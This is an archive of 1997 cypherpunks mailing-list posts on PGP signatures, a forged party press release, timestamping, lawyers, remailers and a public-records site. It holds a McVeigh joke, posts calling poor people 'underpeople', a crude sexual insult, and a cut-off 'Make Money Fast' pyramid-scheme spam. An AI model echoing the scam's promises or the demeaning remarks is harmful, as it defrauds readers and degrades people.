Date: Thu, 21 Aug 1997 08:44:46 +0800
Subject: Bad signature from announce@lp.org
In-Reply-To: 
Message-ID: 



On Wed, 20 Aug 1997, Jim Burnes wrote:

> > > ------- Forwarded Message Follows -------
> > > -----BEGIN PGP SIGNED MESSAGE-----
> > > 
> > > ===============================================
> > > NEWS FROM THE LIBERTARIAN PARTY
> > > 2600 Virginia Avenue, NW, Suite 100
> > > Washington DC 20037
> > > ===============================================
> > [...]
> > 
> > On my machine, using keyid 1024/A7406ED1  the signature
> > did not match the message.  Most likely there was a harmless alteration in
> > the process of being forwarded, but possibly the message is bogus. 
> > 
> > Martin Pool
> > 
> > 
> 
> Yes...the "-------- Forwarded Message Follows ------" line.
> 
> Unless you already took that into account in which case its
> probably the ">" symbols or something to that effect.

No, the "-------- Forwarded Message Follows ------" line is before the PGP
begin line, so I think it should not corrupt the signature.  I can't see
any '>' quotes inside the message.  I suppose probably there's an extra
space or newline in there.  I'm not 100% sure if PGP collapses
whitespace to avoid this or not... I imagine probably not.

Martin Pool







From councill at earthlink.net  Wed Aug 20 17:45:16 1997
From: councill at earthlink.net (John Wiley Councill IV)
Date: Thu, 21 Aug 1997 08:45:16 +0800
Subject: PGP 5.0
Message-ID: <199708210036.RAA27490@belize.it.earthlink.net>



How secure is a  message encrypted with a 4096 bit key via PGP 5.0; what
kind of processing power and resources would be required to crack such a
message?






From tm at dev.null  Wed Aug 20 18:36:12 1997
From: tm at dev.null (Tim McVeigh)
Date: Thu, 21 Aug 1997 09:36:12 +0800
Subject: I regret...
Message-ID: <33FB973E.5A@dev.null>



"I regret that I have but 169 lives (and one leg) 
 to give for my country."

  - Tim McVeigh






From dformosa at st.nepean.uws.edu.au  Wed Aug 20 18:36:19 1997
From: dformosa at st.nepean.uws.edu.au (? the platypus {aka David Formosa})
Date: Thu, 21 Aug 1997 09:36:19 +0800
Subject: None
In-Reply-To: 
Message-ID: 



On Wed, 20 Aug 1997, Anonymous wrote:

> >It's actually closer to a cult -- a small group with it's own shared
> >reality -- a reality quite at variance with societal norms. 

[...]

> Ahhh, look, the spook speaks.

Never the less the spook has a good point.  We must never let ourselfs get
into a form of group thing or let ourselfs get blinded by ideology.



Please excuse my spelling as I suffer from agraphia see the url in my header. 
Never trust a country with more peaple then sheep. Buy easter bilbies.
Save the ABC Is $0.08 per day too much to pay?   ex-net.scum and proud
I'm sorry but I just don't consider 'because its yucky' a convincing argument






From nobody at REPLAY.COM  Wed Aug 20 19:18:32 1997
From: nobody at REPLAY.COM (Anonymous)
Date: Thu, 21 Aug 1997 10:18:32 +0800
Subject: Bogus Libertarian Message / Re: (Fwd) Release: Texas & Ruby Ridge killings (fwd)
Message-ID: <199708210200.EAA04815@basement.replay.com>



On Thu, 22 Aug 1997, Martin Pool wrote:
> On Wed, 19 Aug 1997, Jim Burnes forwarded a message from announce at lp.org:
> > -----BEGIN PGP SIGNED MESSAGE-----
> > ===============================================
> > NEWS FROM THE LIBERTARIAN PARTY
> > 2600 Virginia Avenue, NW, Suite 100
> > Washington DC 20037
> > ===============================================
> [...]
> On my machine, using keyid 1024/A7406ED1  the signature
> did not match the message.  Most likely there was a harmless alteration in
> the process of being forwarded, but possibly the message is bogus.

  It was a bogus message. I have a copy with a valid signature which I
have pasted below.

------- Forwarded Message Follows -------
Date:          Tue, 19 Aug 97 14:36:32 PDT
From:          announce at lp.org
Subject:       Release: Texas & Ruby Ridge killings
Reply-to:      announce at lp.org
To:            announce at lp.org (Libertarian Party announcements)


-----BEGIN PGP SIGNED MESSAGE-----

===============================================
NEWS FROM THE LIBERTARIAN PARTY
2600 Virginia Avenue, NW, Suite 100
Washington DC 20037
===============================================
For release: August 19, 1997
===============================================
For additional information:
Tim C. May, Deputy Director of Communications
Phone: (202) 333-0008 Ext. 222
E-Mail: 76214.3676 at CompuServe.com
===============================================

	NUKE D.C. !!!
	NUKE D.C. !!!
	NUKE D.C. !!!

-----BEGIN PLP SIGNATURE-----
Version: 6.2.2

iQCUAwUBM/nQWdCSe1KnQG7RAQF05gP4z/KAS8YO63ZqLkzPd3VsC3EZdDJoClCG
rxzwtkAHpOnm52ecZMw6ZWVMAq+iMwr68wqosEb9uM9nQqv9ObeO7DXBJTigfYZ5
yEho/Ee8Bjpl88n5LVKcF7QeOjsagd67/QpcLXjnTTnd7ETjxPcROWA0NaG5YPUZ
sAiLthYDKg==
=7Kcd
-----END PLP SIGNATURE-----






From nobody at REPLAY.COM  Wed Aug 20 19:18:41 1997
From: nobody at REPLAY.COM (Anonymous)
Date: Thu, 21 Aug 1997 10:18:41 +0800
Subject: None Other / Re: None
Message-ID: <199708210200.EAA04796@basement.replay.com>



? the platypus {aka David Formosa} wrote:
> On Wed, 20 Aug 1997, Anonymous wrote:
> > >It's actually closer to a cult -- a small group with it's own shared
> > >reality -- a reality quite at variance with societal norms.
> 
> > Ahhh, look, the spook speaks.
> 
> Never the less the spook has a good point.  We must never let ourselfs get
> into a form of group thing or let ourselfs get blinded by ideology.

  "Close ranks! Every man for himself!"







From frissell at panix.com  Wed Aug 20 19:49:25 1997
From: frissell at panix.com (frissell at panix.com)
Date: Thu, 21 Aug 1997 10:49:25 +0800
Subject: An end to "court appointed attorneys"
In-Reply-To: <25723.872103623@zelkova.qualcomm.com>
Message-ID: <3.0.2.32.19970820223440.03e9f9bc@panix.com>



-----BEGIN PGP SIGNED MESSAGE-----

At 12:14 PM 8/20/97 -0700, Tim May wrote:
>I don't buy this. You are, of course, welcome to join Patrick Oonk in
>funding lawyers for those unable (or unwilling) to pay. Demanding that I
>pay for your charitable desires is, of course, theft.
>
>Why should those who managed to save money, for example, subsidize those
>who did not? Jim Bell, for example (but not to pick on him...but he's the
>current example), is almost as old as I am. And yet he made choices in his
>career which left him indigent, or unable to pay for a legal defense. So
>why should I and other taxpayers, including those working for $7 an hour at
>Taco Bell, subsidize his lawyer-in-training?

Besides, as Bell & McVeigh found out free lawyers are worth what you pay 
them.  Most felons could do a better job in their own case (or at least no 
worse) than these two did.  Besides, if you have a lawyers, you are usually 
prevented from using some of the more creative defenses because a lawyer has 
too much to lose.

Note what happened with Kevorkian's lawyer the last time he and "Jack the 
Dripper" were in court.  This lawyer has over the years changed from being a 
lawyer to being a total partisan for his client.  After his opening statement 
a few months ago on the latest of the Good Doctor's prosecutions for assisted 
suicide, the judge granted a mistrial because the statement was so 
prejudicial.  The DA later announced that he would not refile because they 
couldn't stop the lawyer from doing the same thing again.  Anyone can do this 
sort of thing and get at least one mistrial but ordinarily a lawyer won't do 
it because it will cause him problems.

Jury nullification and aggressive attacks on the judge and the prosecutor are 
just a few of the defense strategies that a lawyer won't indulge in but a 
client proceeding in pro per is free to use.

DCF

"I respectfully request that your Honor recuse yourself because you have a 
financial interest in the outcome of these proceedings.  Your salary is paid 
from tax monies and if my arguments on the tax system are accepted, your 
income will be cut off.  I request appointment of a judge who does not 
receive payment from taxation."
-----BEGIN PGP SIGNATURE-----
Version: PGP for Personal Privacy 5.0
Charset: noconv

iQCVAwUBM/upP4VO4r4sgSPhAQHm7gP8CHCKx1l0ob5ldcglz5oTmnz56YRk6ZAi
zgNvOJm10oKdwBKfLccEilrQn6zBHuUbLshOyFJwVOZYD4BK1Gde1iFPsOFeIYkL
338dAJIEgA1Yy05ncdI9wIwWTqFIoC4xDL0xa37gOAOSBGQgxtMVn8c/ZE4PNptx
CCr48DvGaMk=
=Ve7H
-----END PGP SIGNATURE-----






From tcmay at got.net  Wed Aug 20 19:55:20 1997
From: tcmay at got.net (Tim May)
Date: Thu, 21 Aug 1997 10:55:20 +0800
Subject: coercion proof timestamping services
In-Reply-To: <199708202137.WAA00738@server.test.net>
Message-ID: 



At 2:37 PM -0700 8/20/97, Adam Back wrote:
>Just some thoughts about creating more robust time-stamping services.
>
>Current time stamping services just generate a PGP key, and sign any
>messages you send them.  PGP signatures already include a time stamp.
>
>Problem: if we find some interesting uses for time-stamps where it
>becomes important that no one can coerce the timestamping service into
>back-signing timestamps in the past, the current timestampers will be
>able to comply, or as they are automated services, simply confiscating
>the machine will likely give the attacker all information required to
>back date any number of time-stamps.

The Surety folks do (or did, as I don't know their current market status) a
lot more than this, and the published hash makes "back-signing"
problematic! Their URL is www.surety.com, and my own Cyphernomicon has a
description.

--Tim May


There's something wrong when I'm a felon under an increasing number of laws.
Only one response to the key grabbers is warranted: "Death to Tyrants!"
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay at got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1398269     | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."









From enoch at zipcon.net  Wed Aug 20 20:27:24 1997
From: enoch at zipcon.net (Mike Duvos)
Date: Thu, 21 Aug 1997 11:27:24 +0800
Subject: I regret...
In-Reply-To: <33FB973E.5A@dev.null>
Message-ID: <19970821031808.19231.qmail@zipcon.net>




> "I regret that I have but 169 lives (and one leg) 
>  to give for my country."

In other McVeigh news, Defense Lawyer Stephen Jones accused his client of
"raising the definition of the term ingratitude to new meanings."

Apparently, legal etiquette now requires that those winning Lethal
Injection at the hands of a Government Shill must profusely thank their
Shill after sentence is passed. 

--
     Mike Duvos         $    PGP 2.6 Public Key available     $
     enoch at zipcon.com   $    via Finger                       $
         {Free Cypherpunk Political Prisoner Jim Bell}






From tcmay at got.net  Wed Aug 20 20:42:47 1997
From: tcmay at got.net (Tim May)
Date: Thu, 21 Aug 1997 11:42:47 +0800
Subject: (Fwd) Release: Texas & Ruby Ridge killings (fwd)
In-Reply-To: 
Message-ID: 



At 5:12 PM -0700 8/20/97, Martin Pool wrote:
>On Wed, 20 Aug 1997, Jim Burnes forwarded a message from announce at lp.org:
>
>> ------- Forwarded Message Follows -------
>> -----BEGIN PGP SIGNED MESSAGE-----
>>
>> ===============================================
>> NEWS FROM THE LIBERTARIAN PARTY
>> 2600 Virginia Avenue, NW, Suite 100
>> Washington DC 20037
>> ===============================================
>[...]
>
>On my machine, using keyid 1024/A7406ED1  the signature
>did not match the message.  Most likely there was a harmless alteration in
>the process of being forwarded, but possibly the message is bogus.
>
>Martin Pool

Thank you, Martin, for informing of this important news!! It is vitally
important that we are informed when press releases from political parties
have malformed or corrupted signatures!

In time, such broadcast announcments to mailing lists, to newsgroups, and
on other fora may actually push spam for "Make Money Fast" into second
place.

Keep up the good work.

--Tim May

There's something wrong when I'm a felon under an increasing number of laws.
Only one response to the key grabbers is warranted: "Death to Tyrants!"
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay at got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1398269     | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."









From tcmay at got.net  Wed Aug 20 20:52:54 1997
From: tcmay at got.net (Tim May)
Date: Thu, 21 Aug 1997 11:52:54 +0800
Subject: An end to "court appointed attorneys"
In-Reply-To: 
Message-ID: 



At 1:16 PM -0700 8/20/97, Patrick Oonk wrote:

>I am glad I live in the Netherlands, where there's at least of bit
>of social consciousness left.
>

As the repercussions of strong, unbreakable, untraceble crypto are felt,
this "social consciousness" will return to what it must be, individual
consciousness. Thus, you, Patrick Oonk, will be perfectly free to donate
money to whatever causes interest you.

But the ability of a herd to take a vote, real or alleged, will not be
sufficient to collect tribute from those who don't want to make the
contribution freely.

As to the billion or so underpeople who are incapable of contributing that
which others are willing to freely compensate them for, think of it as
evolution in action.

Besides, in about 6.7 years, the world will have replaced them. People are
like Doritos...the world will make more.

--Tim May

There's something wrong when I'm a felon under an increasing number of laws.
Only one response to the key grabbers is warranted: "Death to Tyrants!"
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay at got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1398269     | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."









From nobody at neva.org  Wed Aug 20 21:20:43 1997
From: nobody at neva.org (Neva Remailer)
Date: Thu, 21 Aug 1997 12:20:43 +0800
Subject: An end to "court appointed attorneys"
Message-ID: <199708210406.VAA11265@mail-gw.pacbell.net>




frissell at panix.com wrote:

> Jury nullification and aggressive attacks on the judge and the prosecutor are
> just a few of the defense strategies that a lawyer won't indulge in but a
> client proceeding in pro per is free to use.
> 
> DCF
> 
> "I respectfully request that your Honor recuse yourself because you have a
> financial interest in the outcome of these proceedings.  Your salary is paid
> from tax monies and if my arguments on the tax system are accepted, your
> income will be cut off.  I request appointment of a judge who does not
> receive payment from taxation."

Things Judges Love To Hear #328:
  "If you're going to be deciding my fate, would you mind peeing into
this cup for me? Nothing personal, you understand."

PissMonger








From mbp at pharos.com.au  Wed Aug 20 21:24:21 1997
From: mbp at pharos.com.au (Martin Pool)
Date: Thu, 21 Aug 1997 12:24:21 +0800
Subject: publicdata.com
Message-ID: 



The fact that it will now be controlled from Anguilla is particularly
tasty. 

Martin
      -- Don't believe everything you read.

------ fwded ------------------------
Forwarded-by: glen mccready 
Resent-Date: Wed, 20 Aug 1997 11:14:49 -0400
Resent-From: 0xdeadbeef at substance.abuse.blackdown.org
Forwarded-by: Nev Dull 
Forwarded-by: "John P. Kole" 

This is referring to the web site that allowed you to obtain drivers
license information from a name, or a name from a license tag number.

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Date: Mon, 18 Aug 1997 02:54
From: WEBINFO at PUBLICDATA.COM
Subj: GoodBye PublicData.com

Dear Friends, 

It is with mixed emotions that I bring you news as to the future of
PublicData.com.  First let me tell you that we appreciate all of the
letters of support that you have sent.  During the many days of
confusion, your kind letters help us to remain focused on the tasks at
hand. 

Our company ShadowSoft, Inc. publishes Public Records CDs and we
specialize in consulting or contracting with databases (preferably
large databases).  ShadowSoft was approached around the end on 1996
and was asked if we could place our public records databases on the
Internet.  After a little bit of tinkering the basic model that you
see at PublicData.com was developed. 

ShadowSoft is staffed with the best technical people in the  
industry but we don't have skills in the area of marketing. 
It has been our desire all along to simply be the technical and 
database contractor for someone who wished to run the business  
of marketing and merchandising PublicData.com.  A law passed by 
the Texas legislature this year banning the distribution of public
data records over the Internet has made finding a merchandiser
difficult and has made us re-think our position.  I have made the
decision that ShadowSoft shall cease operating PublicData.com on
August 31, 1997. 

Because of my own personal belief that keeping public records  
available to the public in a free society is critical and essential to
keeping our country free, ShadowSoft has sold PublicData.com to a
company based in Anguilla, British West Indies.  The company which is
named PublicData.com.ai Ltd. has purchased all of the programs that
ShadowSoft developed which gives you access to the information over
the Internet.  In addition, ShadowSoft will  consult for
PublicData.com but our data was not sold to them  as a part of our
deal.  Instead, PublicData.com has purchased another copy of the same
databases and should be able to provide uninterrupted service to you
after September 1, 1997. 

The new owners of PublicData.com should be sending you a note 
very soon.  Thanks again for all of your support and please consider 
keeping a subscription with PublicData.com. 

Sincerely, 

Bruce 
President 

ShadowSoft, Inc.






From nobody at REPLAY.COM  Wed Aug 20 22:25:09 1997
From: nobody at REPLAY.COM (Anonymous)
Date: Thu, 21 Aug 1997 13:25:09 +0800
Subject: Remailer chaining
Message-ID: <199708210506.HAA25290@basement.replay.com>



C. James wrote:

> Since Jam started chaining  through  Neva I have had double the
> complaints, double the spam.  It�s like I run 2 remailers now. 

Multiple Choice:

1) Chain all of your mail through Jam, then it will be like you
are both running no remailer.

2) Chail all of your incoming mail, except for that from Jam,
through Jam, then it will be like you are both running 1 remailer.

3) Put Jam's abuse address in your headers, then it will be like
Jam is running 2 remailers.

4) Put the Whitehouse address as the abuse address in your headers,
and write to let us know how Jim Bell is doing.

ChainMonger






From kent at songbird.com  Wed Aug 20 22:37:22 1997
From: kent at songbird.com (Kent Crispin)
Date: Thu, 21 Aug 1997 13:37:22 +0800
Subject: An end to "court appointed attorneys"
In-Reply-To: 
Message-ID: <19970820222934.23073@bywater.songbird.com>



On Wed, Aug 20, 1997 at 08:51:09PM -0700, Tim May wrote:
> At 1:16 PM -0700 8/20/97, Patrick Oonk wrote:
> 
> >I am glad I live in the Netherlands, where there's at least of bit
> >of social consciousness left.
> >
> 
> As the repercussions of strong, unbreakable, untraceble crypto are felt,
> this "social consciousness" will return to what it must be, individual
> consciousness. Thus, you, Patrick Oonk, will be perfectly free to donate
> money to whatever causes interest you.
> 
> But the ability of a herd to take a vote, real or alleged, will not be
> sufficient to collect tribute from those who don't want to make the
> contribution freely.

Note another characteristic of cult thinking -- total separation of
the illuminati from the "herd" -- the idea that the "chosen" are
irrevocably different from those other unfortunate creatures that
accidentally share the same physical form. 

It is also worth noting that frequently cult members are very
intelligent, very capable people -- high intelligence is absolutely no
defense against insanity. 

> As to the billion or so underpeople who are incapable of contributing that
> which others are willing to freely compensate them for, think of it as
> evolution in action.
> 
> Besides, in about 6.7 years, the world will have replaced them. People are
> like Doritos...the world will make more.

One wonders if there is a microscope powerful enough to resolve Tim 
May's heart.

-- 
Kent Crispin				"No reason to get excited",
kent at songbird.com			the thief he kindly spoke...
PGP fingerprint:   B1 8B 72 ED 55 21 5E 44  61 F4 58 0F 72 10 65 55
http://songbird.com/kent/pgp_key.html






From nobody at REPLAY.COM  Wed Aug 20 23:12:37 1997
From: nobody at REPLAY.COM (Anonymous)
Date: Thu, 21 Aug 1997 14:12:37 +0800
Subject: An end to "court appointed attorneys"
Message-ID: <199708210600.IAA00387@basement.replay.com>



Tim May wrote:
> 
> At 1:16 PM -0700 8/20/97, Patrick Oonk wrote:
> 
> >I am glad I live in the Netherlands, where there's at least of bit
> >of social consciousness left.

> think of it as
> evolution in action.
> 
> Besides, in about 6.7 years, the world will have replaced them. People are
> like Doritos...the world will make more.

  Doritos, broken eggs and spilled milk are the key in-greed-ients
for Huevos Capitalist. (No onions, because of the spilled milk.)

  Poached eggs are the key in-thieve-ient for Huevos Socialist.
(No garlic, because blood-suckers are allergic to it.)

  (When people ask me what I brought to a pot-luck dinner, I tell
them I brought a pig's stomach.)

HuevoMonger






From anon at anon.efga.org  Wed Aug 20 23:27:15 1997
From: anon at anon.efga.org (Anonymous)
Date: Thu, 21 Aug 1997 14:27:15 +0800
Subject: None
Message-ID: 



At 07:26 PM 8/20/97 -0700, you wrote:
>Slippery slopes are something to worry about, for sure.  But
librarians are experts in this.  We put a lot of thought and care into
"borderline cases", we agonize over Madonna's Sex and American Psycho.
 That's why the early filters were unacceptable to us.  You may not
like filters, but you have to admit, they have improved a great deal,
offering much finer granularity and configurability than before, and
improving all the time.

ROFLMAO!!!

>
>Most would-be censors I've met aren't evil people, they're intentions
are usually quite noble and sincere.

Except they want to censor everyone based on their views, which is
tyranny.  That isn't noble.

>True, many of them are wrong and misguided, but it accomplishes
nothing to demonize people you disagree with, except to promote fear
and misunderstanding.

I don't misunderstand censors.  They're Nazi bastards who enjoy making
the internet to fit their evil views and intentions, not caring what
the rest of free speechers on the net care.






From real at freenet.edmonton.ab.ca  Thu Aug 21 01:14:36 1997
From: real at freenet.edmonton.ab.ca (Graham-John Bullers)
Date: Thu, 21 Aug 1997 16:14:36 +0800
Subject: Degausser
In-Reply-To: <199708170622.IAA14546@basement.replay.com>
Message-ID: 



On Sun, 17 Aug 1997, Anonymous wrote:

I think Vulis needs each of us to send ten copies of this back to him.

> Tim C[reep] Mayflower will fuck anything that moves, but he'd rather be
> fucking his own mother's dead body.
> 
>          __o
>        _ \<_  Tim C[reep] Mayflower
>       (_)/(_)
> 

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Graham-John Bullers                      Moderator of alt.2600.moderated   
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    email :  : 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
         http://www.freenet.edmonton.ab.ca/~real/index.html
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~






From nobody at REPLAY.COM  Thu Aug 21 02:19:06 1997
From: nobody at REPLAY.COM (Anonymous)
Date: Thu, 21 Aug 1997 17:19:06 +0800
Subject: CypherPunk Cults / Re: An end to "court appointed attorneys"
Message-ID: <199708210826.KAA14179@basement.replay.com>



Kent Crispin wrote:

> On Wed, Aug 20, 1997 at 08:51:09PM -0700, Tim May wrote:
> > But the ability of a herd to take a vote, real or alleged, will not be
> > sufficient to collect tribute from those who don't want to make the
> > contribution freely.
 
> Note another characteristic of cult thinking -- total separation of
> the illuminati from the "herd" -- the idea that the "chosen" are
> irrevocably different from those other unfortunate creatures that
> accidentally share the same physical form.

  I am one of the "chosen." As a matter of fact, I am not only 
the Grand PoohBaah of the TruthMonger CypherPunk Cult, I am its
"sole" member.
  Black Unicorn is the "soul" member of the Black Unicorn CypherPunk
Cult, and its Grand Pooh-Baaa...Baaaa...Baaaa.
  Blanc Weber is the Grand PoohBroad of the Blanc Weber CypherPunk
Cult, even though her cult does not have a "member."

  I realize that it is difficult for someone who defines themself
by their position in the "group" or their membership in the "herd"
to truly conceive of perceiving life from the perspective of an
individual entity with social capabilities.
  If the cypherpunks mailing list is attacked in my presence, I may
well choose to join in circling the wagons, even if I am capable of
outrunning the attack, or I may choose to shout, "It's OK, I'm going
for help." as I ride off over the horizon to the nearest bar. And
later I may make the same or a different choice if the fight-
censorship list is attacked in my presence.

  The key word is "choice." As in "free."
  "Free...Choice"
  Am I missing something here? Does my brain make a connection between
these two words because of an electrical malfunction, or am I correct
in my assumption that these two concepts are closely related?

  "Voluntary...Mandatory"
  Buuzzzzzz!!!!!!!!!!!!!
  Oops! This combination causes a genuine short circuit, setting off all
kinds of bells, buzzers and flashing lights.
  (BAD COP! NO DONUT!!)

  To tell the truth, I "chose" myself as sole member and Grand 
PoohBah of the TruthMonger CypherPunk Cult because I *do* feel 
that I am "irrevocably different" from "those other unfortunate
creatures" that share a physical form similar to mine.
  Of course all of those other people are fucking idiots! That's
why I chose *me* to live my life, and not them. And I'm sure that
most of them feel the same. Have you ever sat down at watched the
world go by, viewing every passing person from the perspective of,
"What if I, in this body, were like them? Thought like them, liked
what they liked, hated what they hated, acted as they act."
  I've done that when I was on top of the world, and I've done 
that when I was in the gutter, and the answer was always the same.
  "Fuck those idiots! I'm *me*, not them!"

  Nothing personal, Kent, but if I had chosen you to live my life,
I think it would have been a bad mistake. And vice-versa, I am sure.

> > As to the billion or so underpeople who are incapable of contributing that
> > which others are willing to freely compensate them for, think of it as
> > evolution in action.
> >
> > Besides, in about 6.7 years, the world will have replaced them. People are
> > like Doritos...the world will make more.
> 
> One wonders if there is a microscope powerful enough to resolve Tim
> May's heart.

  Tim speaks of those who feel it is their duty/right to "collect
tribute from those who don't want to make the contribution freely."
  Do you feel he is "obligated" to pay tribute to the people who
show up on his doorstep wanting money to buy child sex-slaves? How
about Bibles? Fatty hamburgers? Lean Cuisine? Taxes?

  Somewhere in the world there is a child dying of hunger who could
be fed for a time if you sold your computer and bought food for the
child. But the child is *not* dying *because* you didn't sell your
computer and buy him/her food.
  The child is dying for the same reason that you and I are also
dying--because it was born. ("No One Gets Out Of Here Alive")

  Bill Gates is a Cult of One, and a starving child is a Cult of
One. Bill Gates is feeding a lot of people. Is he feeding *enough*
people? Ask him, I'm sure he'll tell you how *he* feels about it.
  Perhaps Bill Gates is "bleeding" a few people to survive in the
business jungle. Is he bleeding *too*many* people? Ask him, I'm
sure he'll tell you how he feels about it.
  Mother Teresa is a Cult of One. That is how many people she
eats for, in order to stay alive. Is she murdering a starving
child with every bite she takes? Do you also need a powerful 
microscope to find *her* heart?

  Years ago, the Reader's Digest had an ancedote about a small
rural town with only one house. When entering the "town" from
either side, there was a welcoming sign just like one sees in
many cities and towns across the nation.
  The sign read something like this:

             "Welcome to Smithville."
                 "Population 1"
              "Mayor -- Dave Smith."
           "Fire Marshall -- Dave Smith"
           "Town Treasurer -- Dave Smith"
  "Drive Carefully. The life you save could be Dave's."

  So it was not surprising to find out that Dave Smith is a CypherPunk.
(David E. Smith )

  Have you never noticed that it is called the cypherpunks mailing list?
                                                         ^
  Plural, Kent, plural. The name is plural in order to warn newcomers
to the list that we are not all "one" and that, despite the wishes of
Rodney King, we may not all "get along." 
  The word "we" is for use by Kings, Priests, and people with tapeworms.
I'm not adverse to striking a deal where you watch my back and I watch
yours, but if you are incapable of watching your own front, then it's
really not my problem.

  If Tim is low on ammo, he would probably find it in his best interest
to cover you while you make a break for yours. If he has plenty of ammo
he might *choose* to do the same, for his own reasons.
  I, for one, however, would not want to show up on his doorstep and
tell him he was *obligated* to cover me while I attempted to get back
the ammo I had given away when the government "required" it of me.
  It's not because I think he's heartless. It's because I *don't*
think he's *brainless*.

TruthMonger
"Who will help me load my Uzi?" said the Little Red Hen.






From 10958720 at 16882.com  Thu Aug 21 18:18:44 1997
From: 10958720 at 16882.com (10958720 at 16882.com)
Date: Thu, 21 Aug 1997 18:18:44 -0700 (PDT)
Subject: TURN $20. INTO $20,000. THIS REALLY WORKS TRY IT!!!
Message-ID: <9378754842ethyl@tel.net>


Dear friend,

The following income opportunity is one you may be interested in 
taking a look at.  It can be started with VERY MINIMAL outlay and the
income
return is TREMENDOUS!

<>  <>  <>  <>  <>  <>  <>  <>  <>  <>  <>  <>  <>  <>  <>  <>
You are about to make at least $50,000 - In less than 90 days Read the
enclosed program...THEN READ IT AGAIN!...
<>  <>  <>  <>  <>  <>  <>  <>  <>  <>  <>  <>  <>  <>  <>  <>

The enclosed information is something I almost let slip through my
fingers.
Fortunately, sometime later I re-read everything and gave some thought
and
study to it.

My name is Christopher Erickson.  Two years ago, the corporation I
worked at
for the past twelve years down-sized and my position was eliminated. 
After
unproductive job interviews,  I decided to open my own business.  Over
the
past year, I incurred many unforeseen financial problems.  I owed my
family,
friends, and creditors over $35,000.  The economy was taking a toll on
my
business and I just couldn't seem to make ends meet.  I had to refinance
and
borrow against my home to support my family and struggling business.  I
truly believe it was wrong for me to be in debt like this.  AT THAT
MOMENT
something significant happened in my life and I am writing to share my
experience in hopes that this will change your life
FOREVER....FINANCIALLY!!!

In mid-December, I received this program via email.  Six months prior to
receiving this program I had been sending away for information on
various
business opportunities.  All of the programs I received, in my opinion,
were
not cost effective.  They were either too difficult for me to comprehend
or
the initial investment was too much for me to risk to see if they worked
or
not.  One claimed I'd make a million dollars in one year...it didn't
tell me
I'd have to write a book to make it.

But like I was saying, in December of '95 I received this program.  I
didn't
send for it, or ask for it, they just got my name off a mailing list. 
THANK
GOODNESS FOR THAT!!!  After reading it several times, to make sure I was
reading it correctly, I couldn't believe my eyes.  
Here was a MONEY-MAKING PHENOMENON.  I could invest as much as I wanted
to
start, without putting me further in debt.  After I got a pencil and
paper
and figured it out, I would at least get my money back.  After
determining
that the program is LEGAL and NOT A CHAIN LETTER, I decided "WHY NOT".

Initially I sent out 10,000 emails.  It only cost me about $15.00 for my
time on-line.  The great thing about email is that I didn't need any
money
for printing to send out the program, only the cost to fulfill my
orders.  I
am telling you like it is, I hope it doesn't turn you off, but I
promised
myself that I would not "rip-off" anyone, no matter 
how much money it cost me!

A good program to help do this is Ready Aim Fire, an email extracting
and
mass mail program 
@ http://microsyssolutions.com/raf/

In less than one week, I was starting to receive orders for REPORT #1.
By
January 13th, I had received 26 orders for REPORT #1.  When you read the
GUARANTEE in the program, you will see that "YOU MUST RECEIVE 15 TO 20
ORDERS FOR REPORT #1 WITHIN TWO WEEKS.  IF YOU DON'T,  SEND OUT MORE
PROGRAMS UNTIL YOU DO!"  My first step in making $50,000 in 20 to 90
days
was done.  By January 30th, I had received 196 orders for REPORT #2.  If
you
go back to the GUARANTEE, "YOU MUST RECEIVE 100 OR MORE ORDERS FOR
REPORT #2
WITHIN TWO WEEKS.  IF NOT, SEND OUT MORE PROGRAMS UNTIL YOU DO.  ONCE
YOU
HAVE 100 ORDERS, THE REST IS EASY, RELAX, YOU WILL MAKE YOUR $50,000
GOAL."
Well, I had 196 orders for REPORT #2, 96 more than I needed.  So I sat
back
and relaxed.  By March 19th, of my emailing of 10,000, I received
$58,000
with more coming in every day.

I paid off  ALL my debts and bought a much needed new car.  Please take
time
to read the attached program, IT WILL CHANGE YOUR LIFE FOREVER!
Remember,  it wont work  if you don't try it.  This program does work,
but
you must follow it EXACTLY!  Especially the rules of not trying to place
your name in a different place.  It doesn't work, you'll lose out on a 
lot
of  money!  REPORT  #2  explains this.  Always follow the guarantee, 15
to
20  orders  for REPORT #1, and 100 or more orders for REPORT #2 and you
will
make  $50,000 or more in 20 to 90 days.  I AM LIVING PROOF THAT IT WORKS
!!!

If you choose not to participate in this program, I'm sorry.  It really
is a
great opportunity with little cost or risk to you.  If you choose to
participate, follow the program and you will be on your way to financial
security.

If you are a fellow business owner and you are in financial trouble like
I
was, or you want to start your own business, consider this a sign.  I
DID!

                                Sincerely,
                                Christopher Erickson

PS  Do you have any idea what 11,700 $5 bills ($58,000) look like piled
up
on a kitchen table? IT'S AWESOME!

"I THREW IT AWAY"
"I  had  received  this program before.  I  threw  it away, but later
wondered if I shouldn't have given it a try.  Of course, I had no idea
who
to contact to get a copy, so I had to wait until I was emailed another
copy
of the program.  Eleven months passed, then it came.  I DIDN'T throw
this
one away.  I made $41,000 on the first try."

                                        Dawn W., Evansville, IN

"NO FREE LUNCH"
"My late father always told me, 'remember, Alan, there is no free lunch
in
